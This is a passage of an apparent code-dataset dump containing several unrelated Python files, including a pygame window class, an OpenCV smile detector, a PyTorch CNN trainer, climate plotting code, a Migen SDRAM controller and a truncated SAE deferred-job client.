virgule)\r\n\trang3 = str(contenu[debut : fin])\r\n\trang3 = int(rang3)#fin des rangs\r\n\t\r\n\t\r\n\t\r\n\tfin += 1\r\n\tdebut = fin# on saute le point virgule\r\n\t\r\n\tfin = parcourir(contenu, fin, barre)#on va a la derniere barre, apres les positions\r\n\t\r\n\trang = contenu[debut : fin]\r\n\tposition = [rang.split(',')]#on determine position en tant que tableau\r\n\t\r\n\r\n\twhile contenu[fin] != '#' :\r\n\t\tfin += 1\r\n\t\tdebut = fin\r\n\t\tif contenu[fin] != '#' :\r\n\t\t\tfin = parcourir(contenu, fin, barre)\r\n\t\t\trang = contenu[debut : fin]\r\n\t\t\tposition.append(rang.split(','))#et on lui place les bonnes valeurs\r\n\r\n\r\n\tlevel = Level(nom, rang1, rang2, rang3)#on cree nore fichier niveau\r\n\r\n\tlevel.setPosition(position)\r\n\t\r\n\treturn(level)#et on le retourne \r\n\t\r\n#lecture du rang du niveau dans le fichier de sauvegardes du joueur, ignore le VOID:0\r\n#Format de sauvegarde : VOID:0,nomduniveau:rang#\r\ndef lecturesave(niveau):\r\n\t#on ouvre le fichier contenant les sauvegardes du joueur\r\n\tlecture = open(\"saves/save.sv\", \"r\")\r\n\t\r\n\tdebut = 0\r\n\tfin = 0\r\n\tretour = 0\r\n\t\r\n\t#on transforme le fichier en grand String\r\n\tcontenu = lecture.read()\r\n\t\r\n\twhile str(contenu[debut+1:(fin)]) != niveau.getNom() and str(contenu[fin]) != \"#\":#tant que on ne l'a pas trouve ou que nous ne somme pas a la fin du fichier\r\n\t\tif fin != 0:\r\n\t\t\tdebut = fin + 2\r\n\t\tfin += 1\r\n\t\twhile str(contenu[fin]) != \"#\" and str(contenu[fin]) != \":\":\r\n\t\t\tfin += 1\r\n\t\r\n\tif str(contenu[fin]) != \"#\":\r\n\t\tretour = int(contenu[fin+1])\r\n\t\t\r\n\treturn(retour)\r\n","sub_path":"lecture.py","file_name":"lecture.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"330177302","text":"import time\n\nimport pygame\n\nfrom _8086 import __version__ as _module_version\nfrom .utils import debug\n\n_TIMEOUT = int((1 / 60) * 1000)\n\n\nclass _8086_Window:\n '''Class to provide and internal interface to pygame.'''\n pygame.init()\n\n try:\n __font = pygame.font.SysFont('firacode', 20)\n except Exception:\n __font = pygame.font.Font('freesans.ttf', 20)\n\n __version__ = _module_version\n\n def __init__(self):\n self.__key_buffer = None\n self.__key_lock = 0\n\n self.__screen = None\n self._width = 500\n self._height = 500\n\n self.children = []\n\n def __repr__(self):\n return f'<_8086.Window Object @ 0x{hex(id(self))[2:].upper()}>'\n\n def __enter__(self):\n if type(self.__screen) != pygame.Surface:\n self.__screen = pygame.display.set_mode([self.width, self.height])\n return self \n\n def __exit__(self, *args):\n pass\n\n def __iter__(self):\n debug('Window: Entering hot loop!')\n\n while self.children:\n child = self.children.pop()\n debug(f'Loaded child {iter(child)}')\n\n return self\n\n def __next__(self):\n pygame.event.pump()\n pygame.time.wait(_TIMEOUT)\n\n @property\n def key(self):\n return self.__key_buffer\n\n @property\n def width(self):\n return self._width\n\n @property\n def height(self):\n return self._height\n\n @property\n def screen(self):\n return self.__screen\n\n @property\n def font(self):\n return self.__font \n\n def blank(self):\n self.screen.fill((0, 0, 0))\n self.update()\n\n def update(self, *args, **kwargs):\n pygame.display.update(*args, **kwargs)\n\n def rect(self, x, y, w, h, color, screen=None):\n pygame.draw.rect(screen or self.__screen, color, (x, y, w, h))\n\n def text(self, text, position, color=None, size=80, font=__font, center=False):\n if not isinstance(text, str):\n data = ''.join(chr(c) for c in text)\n else:\n data = text\n\n surface = font.render(data, True, color or (0, 0, 0))\n rect = surface.get_rect()\n\n if not center:\n rect.topleft = position\n else:\n rect.center = position\n\n self.__screen.blit(surface, rect)\n\n def getch(self):\n if pygame.event.peek((pygame.KEYDOWN, pygame.KEYUP)):\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n self.__key_lock = 0\n self.__key_buffer = event.key\n\n elif event.type == pygame.KEYUP:\n self.__key_buffer = None\n\n if self.__key_lock:\n return None\n\n self.__key_lock = 1\n return self.__key_buffer\n","sub_path":"_8086/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"130130484","text":"'''\nhere we will use the same code in the face detector, along with some more to detect a smile \nif a smile is detected (using haarcascades) then 'smiling' will show beneath the box surrouding the face\nagain, the .xml file with the smile haarcascades must be in the same directory as this file for it to work \n\n'''\n\nfrom cv2 import * \n\n\n# face and smile classifiers \nface_detector = CascadeClassifier('haarcascade_frontalface_default.xml')\nsmile_detector = CascadeClassifier('haarcascade_smile.xml')\n\nwebcam = VideoCapture(0)\n\nwhile True:\n succesful_frame_read, frame = webcam.read()\n\n if not succesful_frame_read:\n break\n\n gray_scaled_frame = cvtColor(frame, COLOR_BGR2GRAY)\n \n faces = face_detector.detectMultiScale(gray_scaled_frame)\n \n\n\n for (x, y, w, h) in faces:\n rectangle(frame, (x, y), (x+h, y+h), (0, 255, 0), 2)\n\n # get the sub frame (using numpy N-dimensional array slicing)\n the_face = frame[y:y+h, x:x+w]\n \n the_face_grayscale = cvtColor(the_face, COLOR_BGR2GRAY)\n \n smiles = smile_detector.detectMultiScale(the_face_grayscale,\n scaleFactor=1.7,\n minNeighbors=20)\n\n\n if len(smiles) > 0:\n putText(frame, 'smiling', (x, y+h+40), fontScale=1, \n fontFace=FONT_HERSHEY_TRIPLEX, color=(255, 255, 255))\n\n\n imshow(\"smile detector\", frame)\n key = waitKey(30)\n\n if key==81 or key==113:\n break\n\nwebcam.release()\ndestroyAllWindows()\n\n\nprint(\"Done\\a\")\n\n","sub_path":"detectors/smile_detector.py","file_name":"smile_detector.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"453401609","text":"'''6/12/2018 Plot pentad by pentad development of JRA Rossby no and precip\n'''\n\nimport numpy as np\nimport xarray as xr\nimport matplotlib.pyplot as plt\nfrom pylab import rcParams\nimport sh\nfrom windspharm.xarray import VectorWind\nimport matplotlib.patches as patches\nfrom data_handling_updates import gradients as gr, model_constants as mc\n\n\ndef plot_vort_dev(video=False, threed=True):\n \n data_w = xr.open_dataset('/disca/share/rg419/jra_omega_pentad_clim.nc')\n data_u = xr.open_dataset('/disca/share/rg419/jra_ucomp_pentad_clim.nc')\n data_v_temp = xr.open_dataset('/disca/share/rg419/jra_vcomp_pentad_clim.nc')\n # v has different time coord to u, presumably due to how Stephen has downloaded/averaged. I think the two are equivalent, so just substitute the time dimension into v\n data_v = xr.DataArray(data_v_temp.var34.values, coords={'pentad': data_u.pentad, 'lat': data_u.lat, 'lon': data_u.lon}, dims=('pentad','lat','lon')) \n print('files opened')\n \n data_u = data_u.var33\n data_w = data_w.var39\n \n zon_adv = data_u.sel(lev=20000.) * gr.ddx(data_u.sel(lev=20000.))\n merid_adv = data_v * gr.ddy(data_u.sel(lev=20000.))\n vert_adv = data_w * (gr.ddp(data_u, pname='lev')).sel(lev=20000.)*100.\n \n sinphi = np.sin(data_u.lat * np.pi/180.)\n f = 2.* mc.omega*sinphi\n if threed:\n rossby = (zon_adv + merid_adv + vert_adv)/(f*data_v)\n else:\n rossby = merid_adv/(f*data_v)\n # Start figure with 1 subplots\n rcParams['figure.figsize'] = 10, 5\n rcParams['font.size'] = 14\n\n for i in range(72):\n fig, ax1 = plt.subplots()\n title = 'Pentad ' + str(int(data_u.pentad[i]))\n \n f1 = rossby.sel(pentad=i+1).plot.contourf(x='lon', y='lat', ax=ax1, add_labels=False, add_colorbar=False, extend='both', zorder=1, levels = np.arange(0.,1.1,0.1))\n \n# data_p.precipitation.sel(pentad=i+1).plot.contour(x='lon', y='lat', ax=ax1, add_labels=False, extend='both', zorder=1, levels=np.arange(2.,21.,2.), colors='k') \n ax1.grid(True,linestyle=':')\n ax1.set_ylim(-60.,60.)\n ax1.set_yticks(np.arange(-60.,61.,30.))\n ax1.set_xticks(np.arange(0.,361.,90.))\n ax1.set_title(title)\n land_mask = '/scratch/rg419/python_scripts/land_era/ERA-I_Invariant_0125.nc'\n land = xr.open_dataset(land_mask)\n land.lsm[0,:,:].plot.contour(ax=ax1, x='longitude', y='latitude', levels=np.arange(-1.,2.,1.), add_labels=False, colors='k')\n ax1.set_ylabel('Latitude')\n ax1.set_xlabel('Longitude')\n \n plt.subplots_adjust(left=0.1, right=0.97, top=0.93, bottom=0.05, hspace=0.25, wspace=0.2)\n cb1=fig.colorbar(f1, ax=ax1, use_gridspec=True, orientation = 'horizontal',fraction=0.05, pad=0.15, aspect=60, shrink=0.5)\n \n vidstr=''\n if video:\n vidstr='video/'\n \n if threed:\n plot_dir = '/scratch/rg419/plots/zonal_asym_runs/gill_development/jra/' + vidstr + '/rossby3d/' \n else:\n plot_dir = '/scratch/rg419/plots/zonal_asym_runs/gill_development/jra/' + vidstr + '/rossby/' \n mkdir = sh.mkdir.bake('-p')\n mkdir(plot_dir)\n \n if video:\n plt.savefig(plot_dir + 'rossby_and_precip_' + str(int(data_u.pentad[i])) + '.png', format='png')\n else:\n plt.savefig(plot_dir + 'rossby_and_precip_' + str(int(data_u.pentad[i])) + '.pdf', format='pdf')\n plt.close()\n\n\nimport subprocess\ndef make_video(filepattern, output):\n command = 'ffmpeg -framerate 5 -y -start_number 30 -i ' + filepattern + ' -vframes 45 -c:v libx264 -r 6 -pix_fmt yuv420p -vf scale=3200:-2 ' + output \n subprocess.call([command], shell=True)\n \n\nif __name__ == \"__main__\":\n\n #plot_vort_dev(threed=True)\n plot_vort_dev(threed=False)\n # plot_vort_dev('half_shallow', land_mask = '/scratch/rg419/Experiments/asym_aquaplanets/input/half_shallow.nc', video=True, threed=True)\n\n #make_video('/scratch/rg419/plots/zonal_asym_runs/gill_development/half_shallow/video/rossby3d/rossby_and_precip_%02d.png', \n # '/scratch/rg419/plots/zonal_asym_runs/gill_development/half_shallow/video/rossby3d/rossby_and_precip.mp4')\n\n \n ","sub_path":"zonal_asym_runs/rossby_precip_jra.py","file_name":"rossby_precip_jra.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"486347345","text":"from __future__ import print_function\nimport torch, sys\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom src.util import sprint\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms\nfrom torchvision.datasets import MNIST, CIFAR10\nfrom sklearn.metrics import *\nimport pandas as pd\n\nDATASETS = {'mnist' : MNIST, 'cifar' : CIFAR10}\nSHAPE = {'mnist' : (1, 28, 28), 'cifar' : (3, 32, 32)}\nCLASS = {'mnist' : 10, 'cifar' : 10}\n\n''' UTIL '''\ndef pad(k):\n return int(np.floor(float(k) / 2))\n\n''' DEFAULT '''\nclass MaskTensor(object):\n def __init__(self, masks, shape):\n super(MaskTensor, self).__init__()\n self.n = len(masks)\n if self.n > 0:\n self.masks = [torch.from_numpy(m).float() for m in masks]\n else:\n self.masks = None\n self.shape = shape\n def __call__(self, x):\n if self.masks == None:\n return x\n X = torch.stack([m * x for m in self.masks], 0)\n return X.view(self.shape[0] * self.n, self.shape[1], self.shape[2])\n\nclass Net(nn.Module):\n def __init__(self, masks, s):\n super(Net, self).__init__()\n ''' in/out '''\n self.masks = masks\n self.c, self.w1, self.w2 = s\n self.n0 = self.c * (len(self.masks) if len(self.masks) > 0 else 1)\n self.n = len(masks)\n ''' neurons '''\n # convolution\n self.n1 = self.n0 * 2\n self.n2 = self.n0 * 4\n self.k1, self.k2 = 4, 4\n self.s1, self.s2 = 1, 1\n self.p1,self.p2 = self.k1 / 2, self.k2 / 2\n self.x1 = self.w1 / (self.n1/self.n0) / (self.n2/self.n1)\n self.x2 = self.w2 / (self.n1/self.n0) / (self.n2/self.n1)\n # connected\n # self.n3 = self.n0 * 64 #/ (self.s1 * self.s2)\n # self.n4 = self.n0 * 32 #/ (self.s1 * self.s2)\n # self.n5 = self.n0 * 16 #/ (self.s1 * self.s2)\n # self.n6 = self.n0 * 8\n # self.n7 = self.n0 * 4\n # self.n8 = self.n0 * 2\n self.n3 = self.n2 * self.x1 * self.x2\n self.n4 = self.n3 / 2\n self.n5 = self.n4 / 2\n self.n6 = self.n5 / 2\n self.n7 = self.n6 / 2\n self.n8 = self.n7 / 2\n self.n9 = self.n8 / 2\n\n ''' layers '''\n # convolution\n self.conv1 = nn.Conv2d(self.n0, self.n1, self.k1, self.s1, self.p1)\n self.conv2 = nn.Conv2d(self.n1, self.n2, self.k2, self.s2, self.p2)\n self.conv2_drop = nn.Dropout2d()\n # connected\n self.fc1 = nn.Linear(self.n3, self.n4)\n self.fc2 = nn.Linear(self.n4, self.n5)\n self.fc3 = nn.Linear(self.n5, self.n6)\n self.fc4 = nn.Linear(self.n6, self.n7)\n self.fc5 = nn.Linear(self.n7, self.n8)\n self.fc6 = nn.Linear(self.n8, self.n9)\n self.fc7 = nn.Linear(self.n9, self.n)\n\n def view(self, x):\n return x.view(-1, self.n3)\n\n def forward(self, x):\n ''' convolution '''\n # in -> conv1\n # print(x.shape)\n x = self.conv1(x)\n x = F.max_pool2d(x, 2)\n x = F.relu(x)\n # conv1 -> conv2\n # print(x.shape)\n x = self.conv2(x)\n x = self.conv2_drop(x)\n x = F.max_pool2d(x, 2)\n x = F.relu(x)\n # print(x.shape)\n\n ''' connected '''\n x = self.view(x)\n # print(x.shape)\n # conv2 -> linear1\n x = self.fc1(x)\n x = F.relu(x)\n x = F.dropout(x, training=self.training)\n # linear1 -> linear2\n x = self.fc2(x)\n x = F.relu(x)\n # linear2 -> linear3\n x = self.fc3(x)\n x = F.relu(x)\n # linear3 -> linear4\n x = self.fc4(x)\n x = F.relu(x)\n # linear4 -> linear5\n x = self.fc5(x)\n x = F.relu(x)\n # linear5 -> linear6\n x = self.fc6(x)\n x = F.relu(x)\n # linear6 -> linear7 (out)\n x = self.fc7(x)\n return F.log_softmax(x, dim=1)\n\n''' RUN TRAIN '''\ndef train(args, model, device, train_loader, optimizer, epoch):\n model.train()\n if args.verbose:\n sprint(1, '[ %d train' % epoch)\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n if args.verbose:\n if batch_idx % args.log == 0:\n sprint(2, '| {:.0f}%\\tloss:\\t{:.6f}'.format(\n 100. * batch_idx / len(train_loader),\n loss.item()))\n\n''' RUN TEST '''\ndef test(args, model, device, test_loader, epoch):\n model.eval()\n test_loss = 0\n correct = 0\n dfp, dfl = pd.DataFrame(), pd.DataFrame()\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n dfp = dfp.append(pd.DataFrame(F.softmax(output,dim=1).tolist()), sort=False, ignore_index=True)\n dfl = dfl.append(pd.DataFrame(target.tolist()), sort=False, ignore_index=True)\n\n y = [l[0] for l in dfl.values]\n test_loss /= len(test_loader.dataset)\n accuracy = float(100. * correct) / float(len(test_loader.dataset))\n score = 100 / (1 + log_loss(y, dfp.values, eps=1E-15))\n sprint(1, '[ {}\\ttest\\t{:.5f}\\t{:.4f}\\t{:.2f}%'.format(epoch, test_loss, score, accuracy))\n return test_loss\n\n''' RUN '''\ndef cnet(args, masks, stats):\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n\n DATA = DATASETS[args.data]\n shape = SHAPE[args.data]\n\n train_loader = DataLoader(DATA('../data', train=True, download=True,\n transform = transforms.Compose([\n transforms.ToTensor(),\n MaskTensor(masks, shape),\n transforms.Normalize(*stats)])),\n batch_size=args.batch, shuffle=True, **kwargs)\n test_loader = DataLoader(DATA('../data', train=False,\n transform = transforms.Compose([\n transforms.ToTensor(),\n MaskTensor(masks, shape),\n transforms.Normalize(*stats)])),\n batch_size=args.test_batch, shuffle=True, **kwargs)\n\n # print('raw data shape')\n # print(train_loader.dataset.train_data.shape)\n model = Net(masks, shape).to(device)\n\n print(str(model)[:-2])\n\n optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min', verbose=True,\n factor=0.05, cooldown=5, patience=10)\n\n print('[epoch\\tmode\\tloss\\tscore\\taccuracy')\n for epoch in range(1, args.epochs + 1):\n train(args, model, device, train_loader, optimizer, epoch)\n scheduler.step(test(args, model, device, test_loader, epoch))\n\n return model\n\n# ''' TEST '''\n# class TestTensor(object):\n# def __init__(self, masks, shape):\n# super(TestTensor, self).__init__()\n# self.shape = shape\n# self.masks = torch.from_numpy(masks).float()\n# def __call__(self, sample):\n# if len(self.masks) == 0:\n# return sample\n# x = sample.view(*shape)\n# X = torch.stack([m * x for m in self.masks], 0)\n# return X\n#\n# class TestNet(nn.Module):\n# def __init__(self, masks, k, n, dim):\n# super(TestNet, self).__init__()\n# ''' in/out '''\n# self.k = k\n# self.dim = dim\n# self.n0 = 1 if len(masks) == 0 else len(masks)\n# self.n = n\n# ''' neurons '''\n# # convolution\n# self.n1 = self.n0 * 10\n# self.n2 = self.n0 * 20\n# self.k1, self.k2 = 4, 4\n# self.s1, self.s2 = 2, 2\n# self.p1 = self.k1 / 2\n# self.p2 = self.k2 / 2\n# self.r1, self.r2 = 2, 2\n#\n# # connected\n# self.n3 = self.n0 * 160 * dim / k\n# self.n4 = self.n0 * 110 * dim / k\n# self.n5 = self.n0 * 50 * dim / k\n#\n# ''' layers '''\n# # convolution\n# self.conv1 = nn.Conv3d(self.n0, self.n1, self.k1, self.s1, self.p1, groups=self.n0)\n# self.conv2 = nn.Conv3d(self.n1, self.n2, self.k2, self.s2, self.p2)#, groups=self.n0)\n# self.conv2_drop = nn.Dropout3d()\n# # connected\n# self.fc1 = nn.Linear(self.n3, self.n4)\n# self.fc2 = nn.Linear(self.n4, self.n5)\n# self.fc3 = nn.Linear(self.n5, self.n)\n#\n# def view(self, x):\n# return x.view(-1, self.n3)\n#\n# def forward(self, x):\n# ''' convolution '''\n# # in -> conv1\n# # print(x.shape)\n# x = self.conv1(x)\n# # print(x.shape)\n# x = F.max_pool3d(x, self.r1)\n# # print(x.shape)\n# x = F.relu(x)\n# # print()\n#\n# # conv1 -> conv2\n# x = self.conv2(x)\n# # print(x.shape)\n# x = self.conv2_drop(x)\n# x = F.max_pool3d(x, self.r2)\n# # print(x.shape)\n# x = F.relu(x)\n# # print()\n#\n#\n# ''' connected '''\n# x = self.view(x)\n# # print(x.shape)\n# # conv2 -> linear1\n# x = self.fc1(x)\n# x = F.relu(x)\n# x = F.dropout(x, training=self.training)\n# # linear1 -> linear2\n# x = self.fc2(x)\n# x = F.relu(x)\n# # linear2 -> linear3 (out)\n# x = self.fc3(x)\n# return F.log_softmax(x, dim=1)\n#\n# # def get_load():\n# # return DataLoader(MNIST('../data', train=True, download=True,\n# # transform = transforms.Compose([transforms.ToTensor()])),\n# # batch_size=1000, shuffle=False)\n# #\n# # def aload(load=get_load()):\n# # p, l = [], []\n# # for data, target in load:\n# # p.append(data)\n# # l.append(target)\n# # p = torch.cat(p, 0).view(-1,28,28)\n# # return p, torch.cat(l)\n","sub_path":"src/cnet.py","file_name":"cnet.py","file_ext":"py","file_size_in_byte":10340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"637900933","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport csv\nimport re\nimport itertools\nimport pprint\npp = pprint.PrettyPrinter(indent=2)\nfrom sknn.platform import cpu64, threading\nfrom sknn.mlp import Regressor, Layer\nimport numpy\nimport sys\nimport logging\n\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import MinMaxScaler\n\nfrom sklearn import cross_validation\n\nfrom sklearn.metrics import mean_squared_error as MSE\n\nlogging.basicConfig(\n format=\"%(message)s\",\n level=logging.DEBUG,\n stream=sys.stdout)\n\nimport numpy as np\nimport pandas as pd\n\nNN_ITERATIONS=1\nCV_ITERATIONS=2\n\nfile_in_users=open(\"/home/pascault/data/users_res.csv\",\"r\")\nreader_users = csv.reader(file_in_users)\n\nfile_in_train=open(\"/home/pascault/data/train_res.csv\",\"r\")\nreader_train = csv.reader(file_in_train)\n\nfile_in_words=open(\"/home/pascault/data/words_res.csv\",\"r\")\nreader_words = csv.reader(file_in_words)\n\ncategories_words = reader_words.next()\ncategories_users = reader_users.next()\ncategories_train = reader_train.next()\n\n\ndef getMasks(categories, keywords):\n mask=map(lambda x: x in keywords, categories)\n antimask=map(lambda x: not x, mask)\n return (mask, antimask)\n\nmask_words, antimask_words = getMasks(categories_words, [\"Artist\", \"User\"])\nmask_users, antimask_users = getMasks(categories_users, [\"User\"])\nmask_train, antimask_train = getMasks(categories_train, [\"Artist\", \"User\"])\n\nwords = pd.DataFrame([ map(lambda x: float(x), row) for row in reader_words], columns=categories_words)\nusers = pd.DataFrame([ map(lambda x: float(x), row) for row in reader_users], columns=categories_users)\ntrain = pd.DataFrame([ map(lambda x: float(x), row) for row in reader_train], columns=categories_train)\n\njoined1 = pd.merge(train, words, on=[\"Artist\",\"User\"])\ndel(train)\ndel(words)\nattributes = pd.merge(joined1, users, on=\"User\")\nattributes=attributes.apply(lambda x: MinMaxScaler().fit_transform(x))\ndel(users)\n\ndel(joined1)\n\npp.pprint(attributes[:10])\n\n#words = { (row[0], row[1]) : list(itertools.compress(row,mask_words)) for row in reader_words }\n#users = { row[0] : list(itertools.compress(row,mask_users)) for row in reader_users }\n#train = { (row[0], row[2]) : list(itertools.compress(row,mask_train)) for row in reader_train }\n\npp.pprint(attributes.Rating[:10])\n#attributes.Rating=attributes['Rating'].apply(lambda x: MinMaxScaler().fit_transform(x))\n#attributes.Rating=MinMaxScaler().fit_transform(attributes.Rating)\n#pp.pprint(attributes.Rating[:10])\nratings=attributes.Rating.as_matrix()\n\ndel attributes[\"Artist\"]\ndel attributes[\"Rating\"]\n\nattributes = attributes.as_matrix()\n\n\n#test_attributes = attributes[:5000]\n#test_ratings = ratings[:5000]\n\nprint(\"#######################\")\n\n#attributes_train, attributes_test, ratings_train, ratings_test = cross_validation.train_test_split(attributes, ratings, test_size=0.10, random_state=42)\n\nnn = Regressor(\n layers=[\n Layer(\"Sigmoid\", units=40),\n Layer(\"Sigmoid\", units=20),\n Layer(\"Sigmoid\", units=8),\n Layer(\"Linear\")],\n learning_rate=0.02,\n n_iter=NN_ITERATIONS)\n\n#pipeline = Pipeline([\n# ('min/max scaler', MinMaxScaler(feature_range=(0.0, 1.0))),\n# ('neural network', nn)])\n\n#pipeline.fit(attributes_train, ratings_train)\n\nscores = cross_validation.cross_val_score(nn, attributes, ratings, scoring='mean_squared_error', cv=CV_ITERATIONS)\n\n#print(\"Predicted values :\")\n#ratings_result = pipeline.predict(attributes_test)\n#pp.pprint(ratings_result[:10])\n#\n#print(\"Expected values :\")\n#pp.pprint(ratings_test[:10])\n#\n##print(\"Differences :\")\n##diff=result_ratings - test_ratings\n##pp.pprint(diff[:10])\n##\n##rmse = diff.mean()\n#rmse = MSE(100*ratings_test, 100*ratings_result)**.5\n#print(\"RMSE = \"+str(rmse))\n\nprint(\"Scores :\")\nprint(scores)\nprint(\"Mean score :\")\nprint(np.array(scores).mean())\n","sub_path":"importInPython.py","file_name":"importInPython.py","file_ext":"py","file_size_in_byte":3840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"441813827","text":"#!/usr/local/bin/python3\n# coding: UTF-8\n# Author: David\n# Email: youchen.du@gmail.com\n# Created: 2017-04-03 11:21\n# Last modified: 2017-04-03 11:26\n# Filename: trans.py\n# Description:\nimport time\nimport threading\n\nimport redis\n\n\nconn = redis.Redis()\n\n\ndef trans():\n pipeline = conn.pipeline()\n pipeline.incr('trans:')\n time.sleep(.1)\n pipeline.incr('trans:', -1)\n print(pipeline.execute()[0])\n\n\nfor i in range(3):\n threading.Thread(target=trans).start()\ntime.sleep(.5)\n","sub_path":"Redis/pipeline/trans.py","file_name":"trans.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"382608453","text":"from migen.fhdl.std import *\nfrom migen.bus import dfi, lasmibus\n\nfrom milkymist.lasmicon.refresher import *\nfrom milkymist.lasmicon.bankmachine import *\nfrom milkymist.lasmicon.multiplexer import *\n\nclass PhySettings:\n\tdef __init__(self, type, dfi_d, nphases, rdphase, wrphase, cmdphase_wr, cmdphase_rd):\n\t\tself.type = type\n\t\tself.dfi_d = dfi_d\n\t\tself.nphases = nphases\n\t\tself.rdphase = rdphase\n\t\tself.wrphase = wrphase\n\t\tself.cmdphase_wr = cmdphase_wr\n\t\tself.cmdphase_rd = cmdphase_rd\n\nclass GeomSettings:\n\tdef __init__(self, bank_a, row_a, col_a):\n\t\tself.bank_a = bank_a\n\t\tself.row_a = row_a\n\t\tself.col_a = col_a\n\t\tself.mux_a = max(row_a, col_a)\n\nclass TimingSettings:\n\tdef __init__(self, tRP, tRCD, tWR, tWTR, tREFI, tRFC, CL, CWL, read_latency, write_latency, read_time, write_time):\n\t\tself.tRP = tRP\n\t\tself.tRCD = tRCD\n\t\tself.tWR = tWR\n\t\tself.tWTR = tWTR\n\t\tself.tREFI = tREFI\n\t\tself.tRFC = tRFC\n\t\t\n\t\tself.CL = CL\n\t\tself.CWL = CWL\n\t\tself.read_latency = read_latency\n\t\tself.write_latency = write_latency\n\t\t\n\t\tself.read_time = read_time\n\t\tself.write_time = write_time\n\nclass LASMIcon(Module):\n\tdef __init__(self, phy_settings, geom_settings, timing_settings):\n\t\tif phy_settings.type in [\"SDR\"]:\n\t\t\tburst_length = phy_settings.nphases*1 # command multiplication*SDR\n\t\telif phy_settings.type in [\"DDR\", \"DDR2\", \"DDR3\"]:\n\t\t\tburst_length = phy_settings.nphases*2 # command multiplication*DDR\n\t\taddress_align = log2_int(burst_length)\n\n\t\tself.dfi = dfi.Interface(geom_settings.mux_a,\n\t\t\tgeom_settings.bank_a,\n\t\t\tphy_settings.dfi_d,\n\t\t\tphy_settings.nphases)\n\t\tself.lasmic = lasmibus.Interface(\n\t\t\taw=geom_settings.row_a + geom_settings.col_a - address_align,\n\t\t\tdw=phy_settings.dfi_d*phy_settings.nphases,\n\t\t\tnbanks=2**geom_settings.bank_a,\n\t\t\tread_latency=timing_settings.read_latency+1,\n\t\t\twrite_latency=timing_settings.write_latency+1)\n\t\tself.nrowbits = geom_settings.col_a - address_align\n\t\n\t\t###\n\n\t\tself.submodules.refresher = Refresher(geom_settings.mux_a, geom_settings.bank_a,\n\t\t\ttiming_settings.tRP, timing_settings.tREFI, timing_settings.tRFC)\n\t\tself.submodules.bank_machines = [BankMachine(geom_settings, timing_settings, address_align, i,\n\t\t\t\tgetattr(self.lasmic, \"bank\"+str(i)))\n\t\t\tfor i in range(2**geom_settings.bank_a)]\n\t\tself.submodules.multiplexer = Multiplexer(phy_settings, geom_settings, timing_settings,\n\t\t\tself.bank_machines, self.refresher,\n\t\t\tself.dfi, self.lasmic)\n\n\tdef get_csrs(self):\n\t\treturn self.multiplexer.get_csrs()\n","sub_path":"milkymist/lasmicon/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"447196380","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport urllib\nimport urllib2\nimport json\nimport const\nfrom core import retry\n\n_BASE_URL = 'http://deferredjob.sae.sina.com.cn/rest.php'\n\n\nclass Error(Exception):\n \"\"\"Base-class for all exception in this module\"\"\"\n\n\nclass InvalidJobError(Error):\n \"\"\"The job's options is invalid\"\"\"\n\n\nclass OperationError(Error):\n \"\"\"operation failed\"\"\"\n\n\nclass TooManyJobsError(Error):\n \"\"\"Added too many jobs\"\"\"\n\n\nclass InternalError(Error):\n \"\"\"There was an internal error while accessing deferredjob service, it should be\n temporary, it problem continues, please contact us\"\"\"\n\n\nclass Job(dict):\n def __init__(self, *args, **kwargs):\n super(Job, self).__init__(*args, **kwargs)\n self.__dict__ = self\n\n\nclass MySQLImport(Job):\n def __init__(self, storage_domain, filename, table_name='', callback_url=''):\n \"\"\"\n :storage_domain: 存放导入文件的storage的domain名称\n :filename: 导入文件名称,格式:prefix[.format][.compression],例:abc.csv.zip,服务根据format来判断数据类型,数据类型包括sql/csv\n :table_name: 导入数据库类型为mysql时,使用的表名\n :callback_url: 任务成功时,调用的回调url,只支持应用默认版本中的url,为空时,不执行回调url\n \"\"\"\n self['tasktype'] = 'import'\n self['dbtype'] = 'mysql'\n self['dbname'] = 'app_{app_name}'.format(app_name=const.APP_NAME)\n\n self['stor_domain'] = storage_domain.strip()\n if not self['stor_domain']:\n raise InvalidJobError(\"storage domain can't be empty!\")\n\n self['stor_filename'] = filename.strip()\n if not self['stor_filename']:\n raise InvalidJobError(\"filename can't be empty!\")\n\n self['tbname'] = table_name\n self['callback'] = callback_url\n\n\nclass MySQLExport(Job):\n def __init__(self, storage_domain, filename, table_name='', 